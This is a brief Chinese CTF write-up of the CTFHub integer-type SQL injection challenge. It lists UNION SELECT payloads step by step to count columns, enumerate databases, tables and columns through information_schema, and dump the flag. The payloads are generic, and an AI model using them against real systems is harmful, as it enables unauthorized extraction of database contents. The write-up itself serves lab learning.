CTFHUB-整数型SQL注入
根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入
使用order by语句查询字段数
参数为3时不回显,说明字段数为2
使用union联合查询检测信息回显位置
id=1 union select 1,2
由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返
id=-1 union select 1,2
id=-1 union select 1,database()
获取当前数据库名
id=-1 union select 1,group_concat(schema_name)from information_schema.schemata
获取所有数据库名
d=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
查询数据库sqli表名
union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
获取flag列所有字段名
获取指定数据库的表的列的内容
union select 1,group_concat(flag) from sqli.flag